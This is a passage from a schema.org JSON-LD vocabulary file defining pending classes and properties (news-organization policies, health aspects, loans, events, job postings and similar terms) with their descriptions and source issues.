"https://github.com/schemaorg/schemaorg/issues/1688" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1688", "http://schema.org/domainIncludes": { "@id": "http://schema.org/NewsMediaOrganization" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/CreativeWork" } ], "rdfs:comment": "For a <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a> or other news-related <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a>, a statement explaining when authors of articles are not named in bylines.", "rdfs:label": "noBylinesPolicy", "rdfs:subPropertyOf": { "@id": "http://schema.org/publishingPrinciples" } }, { "@id": "http://schema.org/CssSelectorType", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1672" }, "http://schema.org/category": "issue-1672", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Text representing a CSS selector.", "rdfs:label": "CssSelectorType", "rdfs:subClassOf": { "@id": "http://schema.org/Text" } }, { "@id": "http://schema.org/Quotation", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/271" }, "http://schema.org/category": "issue-271", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A quotation. Often but not necessarily from some written work, attributable to a real world author and - if associated with a fictional character - to any fictional Person. Use <a class=\"localLink\" href=\"http://schema.org/isBasedOn\">isBasedOn</a> to link to source/origin. The <a class=\"localLink\" href=\"http://schema.org/recordedIn\">recordedIn</a> property can be used to reference a Quotation from an <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a>.", "rdfs:label": "Quotation", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/PreventionHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Information about actions or measures that can be taken to avoid getting the topic or reaching a critical situation related to the topic.", "rdfs:label": "PreventionHealthAspect" }, { "@id": "http://schema.org/actionableFeedbackPolicy", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1525", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/NewsMediaOrganization" }, { "@id": "http://schema.org/Organization" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/CreativeWork" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "For a <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a> or other news-related <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a>, a statement about public engagement activities (for news media, the newsroom’s), including involving the public - digitally or otherwise -- in coverage decisions, reporting and activities after publication.", "rdfs:label": "actionableFeedbackPolicy", "rdfs:subPropertyOf": { "@id": "http://schema.org/publishingPrinciples" } }, { "@id": "http://schema.org/PodcastSeason", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/373" }, "http://schema.org/category": "issue-373", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A single season of a podcast. Many podcasts do not break down into separate seasons. In that case, PodcastSeries should be used.", "rdfs:label": "PodcastSeason", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWorkSeason" } }, { "@id": "http://schema.org/legislationApplies", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" }, { "@id": "http://publications.europa.eu/mdr/eli/index.html" } ], "http://schema.org/category": "issue-1156", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Legislation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Legislation" }, "http://www.w3.org/2002/07/owl#equivalentProperty": { "@id": "http://data.europa.eu/eli/ontology#implements" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#implements" }, "rdfs:comment": "Indicates that this legislation (or part of a legislation) somehow transfers another legislation in a different legislative context. This is an informative link, and it has no legal value. For legally-binding links of transposition, use the <a href=\"/legislationTransposes\">legislationTransposes</a> property. For example an informative consolidated law of a European Union's member state \"applies\" the consolidated version of the European Directive implemented in it.", "rdfs:label": "legislationApplies" }, { "@id": "http://schema.org/eventAttendanceMode", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1842" }, "http://schema.org/category": "issue-1842", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Event" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/EventAttendanceModeEnumeration" }, "rdfs:comment": "The eventAttendanceMode of an event indicates whether it occurs online, offline, or a mix.", "rdfs:label": "eventAttendanceMode" }, { "@id": "http://schema.org/OpinionNewsArticle", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" } ], "http://schema.org/category": "issue-1525", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An <a class=\"localLink\" href=\"http://schema.org/OpinionNewsArticle\">OpinionNewsArticle</a> is a <a class=\"localLink\" href=\"http://schema.org/NewsArticle\">NewsArticle</a> that primarily expresses opinions rather than journalistic reporting of news and events. For example, a <a class=\"localLink\" href=\"http://schema.org/NewsArticle\">NewsArticle</a> consisting of a column or <a class=\"localLink\" href=\"http://schema.org/Blog\">Blog</a>/<a class=\"localLink\" href=\"http://schema.org/BlogPosting\">BlogPosting</a> entry in the Opinions section of a news publication.", "rdfs:label": "OpinionNewsArticle", "rdfs:subClassOf": { "@id": "http://schema.org/NewsArticle" } }, { "@id": "http://schema.org/currentExchangeRate", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/ExchangeRateSpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/UnitPriceSpecification" }, "rdfs:comment": "The current price of a currency.", "rdfs:label": "currentExchangeRate" }, { "@id": "http://schema.org/SeeDoctorHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Information about questions that may be asked, when to see a professional, measures before seeing a doctor or content about the first consultation.", "rdfs:label": "SeeDoctorHealthAspect" }, { "@id": "http://schema.org/CovidTestingFacility", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2490" }, "http://schema.org/category": "issue-2490", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A CovidTestingFacility is a <a class=\"localLink\" href=\"http://schema.org/MedicalClinic\">MedicalClinic</a> where testing for the COVID-19 Coronavirus\n disease is available. If the facility is being made available from an established <a class=\"localLink\" href=\"http://schema.org/Pharmacy\">Pharmacy</a>, <a class=\"localLink\" href=\"http://schema.org/Hotel\">Hotel</a>, or other\n non-medical organization, multiple types can be listed. This makes it easier to re-use existing schema.org information\n about that place e.g. contact info, address, opening hours. Note that in an emergency, such information may not always be reliable.", "rdfs:label": "CovidTestingFacility", "rdfs:subClassOf": { "@id": "http://schema.org/MedicalClinic" } }, { "@id": "http://schema.org/LegalForceStatus", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" }, { "@id": "http://publications.europa.eu/mdr/eli/index.html" } ], "http://schema.org/category": "issue-1156", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#InForce" }, "rdfs:comment": "A list of possible statuses for the legal force of a legislation.", "rdfs:label": "LegalForceStatus", "rdfs:subClassOf": { "@id": "http://schema.org/Enumeration" } }, { "@id": "http://schema.org/employmentUnit", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2296" }, "http://schema.org/category": "issue-2296", "http://schema.org/domainIncludes": { "@id": "http://schema.org/JobPosting" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Organization" }, "rdfs:comment": "Indicates the department, unit and/or facility where the employee reports and/or in which the job is to be performed.", "rdfs:label": "employmentUnit" }, { "@id": "http://schema.org/Claim", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1828" }, "http://schema.org/category": "issue-1828", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A <a class=\"localLink\" href=\"http://schema.org/Claim\">Claim</a> in Schema.org represents a specific, factually-oriented claim that could be the <a class=\"localLink\" href=\"http://schema.org/itemReviewed\">itemReviewed</a> in a <a class=\"localLink\" href=\"http://schema.org/ClaimReview\">ClaimReview</a>. The content of a claim can be summarized with the <a class=\"localLink\" href=\"http://schema.org/text\">text</a> property. Variations on well known claims can have their common identity indicated via <a class=\"localLink\" href=\"http://schema.org/sameAs\">sameAs</a> links, and summarized with a <a class=\"localLink\" href=\"http://schema.org/name\">name</a>. Ideally, a <a class=\"localLink\" href=\"http://schema.org/Claim\">Claim</a> description includes enough contextual information to minimize the risk of ambiguity or inclarity. In practice, many claims are better understood in the context in which they appear or the interpretations provided by claim reviews.<br/><br/>\n\nBeyond <a class=\"localLink\" href=\"http://schema.org/ClaimReview\">ClaimReview</a>, the Claim type can be associated with related creative works - for example a <a class=\"localLink\" href=\"http://schema.org/ScholaryArticle\">ScholaryArticle</a> or <a class=\"localLink\" href=\"http://schema.org/Question\">Question</a> might be <a class=\"localLink\" href=\"http://schema.org/about\">about</a> some <a class=\"localLink\" href=\"http://schema.org/Claim\">Claim</a>.<br/><br/>\n\nAt this time, Schema.org does not define any types of relationship between claims. This is a natural area for future exploration.", "rdfs:label": "Claim", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/BenefitsHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Content about the benefits and advantages of usage or utilization of topic.", "rdfs:label": "BenefitsHealthAspect" }, { "@id": "http://schema.org/InvestmentFund", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" }, { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" } ], "http://schema.org/category": "issue-1253", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A company or fund that gathers capital from a number of investors to create a pool of money that is then re-invested into stocks, bonds and other assets.", "rdfs:label": "InvestmentFund", "rdfs:subClassOf": { "@id": "http://schema.org/InvestmentOrDeposit" } }, { "@id": "http://schema.org/sdPublisher", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1886" }, "http://schema.org/category": "issue-1886", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CreativeWork" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Organization" }, { "@id": "http://schema.org/Person" } ], "rdfs:comment": "Indicates the party responsible for generating and publishing the current structured data markup, typically in cases where the structured data is derived automatically from existing published content but published on a different site. For example, student projects and open data initiatives often re-publish existing content with more explicitly structured metadata. The\n<a class=\"localLink\" href=\"http://schema.org/sdPublisher\">sdPublisher</a> property helps make such practices more explicit.", "rdfs:label": "sdPublisher" }, { "@id": "http://schema.org/appearance", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1828" }, "http://schema.org/category": "issue-1828", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Claim" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/CreativeWork" }, "rdfs:comment": "Indicates an occurence of a <a class=\"localLink\" href=\"http://schema.org/Claim\">Claim</a> in some <a class=\"localLink\" href=\"http://schema.org/CreativeWork\">CreativeWork</a>.", "rdfs:label": "appearance", "rdfs:subPropertyOf": { "@id": "http://schema.org/workExample" } }, { "@id": "http://schema.org/merchantReturnLink", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/domainIncludes": { "@id": "http://schema.org/MerchantReturnPolicy" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/URL" }, "rdfs:comment": "Indicates a Web page or service by URL, for product return.", "rdfs:label": "merchantReturnLink" }, { "@id": "http://schema.org/diversityPolicy", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1525", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Organization" }, { "@id": "http://schema.org/NewsMediaOrganization" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/CreativeWork" } ], "rdfs:comment": "Statement on diversity policy by an <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a> e.g. a <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a>. For a <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a>, a statement describing the newsroom’s diversity policy on both staffing and sources, typically providing staffing data.", "rdfs:label": "diversityPolicy" }, { "@id": "http://schema.org/Guide", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2405" }, "http://schema.org/category": "issue-2405", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "<a class=\"localLink\" href=\"http://schema.org/Guide\">Guide</a> is a page or article that recommend specific products or services, or aspects of a thing for a user to consider. A <a class=\"localLink\" href=\"http://schema.org/Guide\">Guide</a> may represent a Buying Guide and detail aspects of products or services for a user to consider. A <a class=\"localLink\" href=\"http://schema.org/Guide\">Guide</a> may represent a Product Guide and recommend specific products or services. A <a class=\"localLink\" href=\"http://schema.org/Guide\">Guide</a> may represent a Ranked List and recommend specific products or services with ranking.", "rdfs:label": "Guide", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/maximumPhysicalAttendeeCapacity", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1842" }, "http://schema.org/category": "issue-1842", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Event" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Integer" }, "rdfs:comment": "The maximum physical attendee capacity of an <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a> whose <a class=\"localLink\" href=\"http://schema.org/eventAttendanceMode\">eventAttendanceMode</a> is <a class=\"localLink\" href=\"http://schema.org/OfflineEventAttendanceMode\">OfflineEventAttendanceMode</a> (or the offline aspects, in the case of a <a class=\"localLink\" href=\"http://schema.org/MixedEventAttendanceMode\">MixedEventAttendanceMode</a>).", "rdfs:label": "maximumPhysicalAttendeeCapacity" }, { "@id": "http://schema.org/CompleteDataFeed", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1397" }, "http://schema.org/category": "issue-1397", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A <a class=\"localLink\" href=\"http://schema.org/CompleteDataFeed\">CompleteDataFeed</a> is a <a class=\"localLink\" href=\"http://schema.org/DataFeed\">DataFeed</a> whose standard representation includes content for every item currently in the feed.<br/><br/>\n\nThis is the equivalent of Atom's element as defined in Feed Paging and Archiving <a href=\"https://tools.ietf.org/html/rfc5005\">RFC 5005</a>, For example (and as defined for Atom), when using data from a feed that represents a collection of items that varies over time (e.g. \"Top Twenty Records\") there is no need to have newer entries mixed in alongside older, obsolete entries. By marking this feed as a CompleteDataFeed, old entries can be safely discarded when the feed is refreshed, since we can assume the feed has provided descriptions for all current items.", "rdfs:label": "CompleteDataFeed", "rdfs:subClassOf": { "@id": "http://schema.org/DataFeed" } }, { "@id": "http://schema.org/RadioBroadcastService", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2109" }, "http://schema.org/category": "issue-2109", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A delivery service through which radio content is provided via broadcast over the air or online.", "rdfs:label": "RadioBroadcastService", "rdfs:subClassOf": { "@id": "http://schema.org/BroadcastService" } }, { "@id": "http://schema.org/numberOfLoanPayments", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/RepaymentSpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Number" }, "rdfs:comment": "The number of payments contractually required at origination to repay the loan. For monthly paying loans this is the number of months from the contractual first payment date to the maturity date.", "rdfs:label": "numberOfLoanPayments" }, { "@id": "http://schema.org/accountOverdraftLimit", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" }, { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/BankAccount" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/MonetaryAmount" }, "rdfs:comment": "An overdraft is an extension of credit from a lending institution when an account reaches zero. An overdraft allows the individual to continue withdrawing money even if the account has no funds in it. Basically the bank allows people to borrow a set amount of money.", "rdfs:label": "accountOverdraftLimit" }, { "@id": "http://schema.org/ReturnShippingFees", "@type": "http://schema.org/ReturnFeesEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "ReturnShippingFees ...", "rdfs:label": "ReturnShippingFees" }, { "@id": "http://schema.org/recognizedBy", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1779" }, "http://schema.org/category": "issue-1779", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalCredential" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Organization" }, "rdfs:comment": "An organization that acknowledges the validity, value or utility of a credential. Note: recognition may include a process of quality assurance or accreditation.", "rdfs:label": "recognizedBy" }, { "@id": "http://schema.org/contentReferenceTime", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1050" }, "http://schema.org/category": "issue-1050", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CreativeWork" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/DateTime" }, "rdfs:comment": "The specific time described by a creative work, for works (e.g. articles, video objects etc.) that emphasise a particular moment within an Event.", "rdfs:label": "contentReferenceTime" }, { "@id": "http://schema.org/refundType", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/domainIncludes": { "@id": "http://schema.org/MerchantReturnPolicy" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/RefundTypeEnumeration" }, "rdfs:comment": "A refundType, from an enumerated list.", "rdfs:label": "refundType" }, { "@id": "http://schema.org/FloorPlan", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A FloorPlan is an explicit representation of a collection of similar accommodations, allowing the provision of common information (room counts, sizes, layout diagrams) and offers for rental or sale. In typical use, some <a class=\"localLink\" href=\"http://schema.org/ApartmentComplex\">ApartmentComplex</a> has an <a class=\"localLink\" href=\"http://schema.org/accommodationFloorPlan\">accommodationFloorPlan</a> which is a <a class=\"localLink\" href=\"http://schema.org/FloorPlan\">FloorPlan</a>. A FloorPlan is always in the context of a particular place, either a larger <a class=\"localLink\" href=\"http://schema.org/ApartmentComplex\">ApartmentComplex</a> or a single <a class=\"localLink\" href=\"http://schema.org/Apartment\">Apartment</a>. The visual/spatial aspects of a floor plan (i.e. room layout, <a href=\"https://en.wikipedia.org/wiki/Floor_plan\">see wikipedia</a>) can be indicated using <a class=\"localLink\" href=\"http://schema.org/image\">image</a>.", "rdfs:label": "FloorPlan", "rdfs:subClassOf": { "@id": "http://schema.org/Intangible" } }, { "@id": "http://schema.org/salaryUponCompletion", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2289" }, "http://schema.org/category": "issue-2289", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalProgram" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/MonetaryAmountDistribution" }, "rdfs:comment": "The expected salary upon completing the training.", "rdfs:label": "salaryUponCompletion" }, { "@id": "http://schema.org/recourseLoan", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" }, { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/LoanOrCredit" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Boolean" }, "rdfs:comment": "The only way you get the money back in the event of default is the security. Recourse is where you still have the opportunity to go back to the borrower for the rest of the money.", "rdfs:label": "recourseLoan" }, { "@id": "http://schema.org/OverviewHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Overview of the content. Contains a summarized view of the topic with the most relevant information for an introduction.", "rdfs:label": "OverviewHealthAspect" }, { "@id": "http://schema.org/WorkBasedProgram", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2289" }, "http://schema.org/category": "issue-2289", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A program with both an educational and employment component. Typically based at a workplace and structured around work-based learning, with the aim of instilling competencies related to an occupation. WorkBasedProgram is used to distinguish programs such as apprenticeships from school, college or other classroom based educational programs.", "rdfs:label": "WorkBasedProgram", "rdfs:subClassOf": { "@id": "http://schema.org/EducationalOccupationalProgram" } }, { "@id": "http://schema.org/trainingSalary", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/2460" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/2289" } ], "http://schema.org/category": [ "issue-2289", "issue-2460" ], "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/EducationalOccupationalProgram" }, { "@id": "http://schema.org/WorkBasedProgram" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/MonetaryAmountDistribution" }, "rdfs:comment": "The estimated salary earned while in the program.", "rdfs:label": "trainingSalary" }, { "@id": "http://schema.org/PrognosisHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Typical progression and happenings of life course of the topic.", "rdfs:label": "PrognosisHealthAspect" }, { "@id": "http://schema.org/travelBans", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2490" }, "http://schema.org/category": "issue-2490", "http://schema.org/domainIncludes": { "@id": "http://schema.org/SpecialAnnouncement" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/WebContent" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "Information about travel bans, e.g. in the context of a pandemic.", "rdfs:label": "travelBans" }, { "@id": "http://schema.org/subTrip", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#Tourism" }, "http://schema.org/category": "issue-1810", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Trip" }, "http://schema.org/inverseOf": { "@id": "http://schema.org/partOfTrip" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Trip" }, "rdfs:comment": "Identifies a <a class=\"localLink\" href=\"http://schema.org/Trip\">Trip</a> that is a subTrip of this Trip. For example Day 1, Day 2, etc. of a multi-day trip.", "rdfs:label": "subTrip" }, { "@id": "http://schema.org/gracePeriod", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/LoanOrCredit" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Duration" }, "rdfs:comment": "The period of time after any due date that the borrower has to fulfil its obligations before a default (failure to pay) is deemed to have occurred.", "rdfs:label": "gracePeriod" }, { "@id": "http://schema.org/abstract", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/276" }, "http://schema.org/category": "issue-276", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CreativeWork" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "An abstract is a short description that summarizes a <a class=\"localLink\" href=\"http://schema.org/CreativeWork\">CreativeWork</a>.", "rdfs:label": "abstract" }, { "@id": "http://schema.org/includesHealthPlanFormulary", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthInsurancePlan" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/HealthPlanFormulary" }, "rdfs:comment": "Formularies covered by this plan.", "rdfs:label": "includesHealthPlanFormulary" }, { "@id": "http://schema.org/hasHealthAspect", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2374", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthTopicContent" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/HealthAspectEnumeration" }, "rdfs:comment": "Indicates the aspect or aspects specifically addressed in some <a class=\"localLink\" href=\"http://schema.org/HealthTopicContent\">HealthTopicContent</a>. For example, that the content is an overview, or that it talks about treatment, self-care, treatments or their side-effects.", "rdfs:label": "hasHealthAspect" }, { "@id": "http://schema.org/loanPaymentFrequency", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": 